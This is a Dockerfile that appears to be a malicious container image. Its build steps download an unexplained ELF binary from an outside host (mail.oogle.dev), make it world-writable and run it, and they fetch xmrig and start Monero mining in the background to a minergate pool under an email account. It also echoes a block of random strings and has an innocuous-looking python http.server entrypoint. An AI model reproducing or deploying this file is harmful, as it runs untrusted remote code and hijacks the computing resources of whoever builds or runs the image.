FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo VeVwgqNfJxRqHYtonO9mrXzUUMn2pDJQ 5tFnJvw7wahnP7L7SeMbaqeLXuZBtHf0 Elc41xoxIUzve77e9CGZgM1erxfqqHUa HTFOPQ5k4F1MlLXUoyOHbsqsBW0CobBw 8aK3rjCxuLsc6ZwL4iTWYtEb7bM3Jrqx ipsn7yWDVbiv6r9XbQGGSA9c6OhiBH2C YE3FstIGLJfgQsl4T7i5JmdnaTSYBDBI EgK5jIIPSNf3IkauAfVTsbingiilXHMu gZF3ZSFpRWUHS0kEYOYIKv9TMRt2VBbC Lp8NvqwLZEiuvDZ02vENeGZN0WdDSAy8 iXKQTxAoitkIoT1K00oZmzLifUnay1mp KGvNgSIfKWmg46LZuHUYgiMPBcq93PEO DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]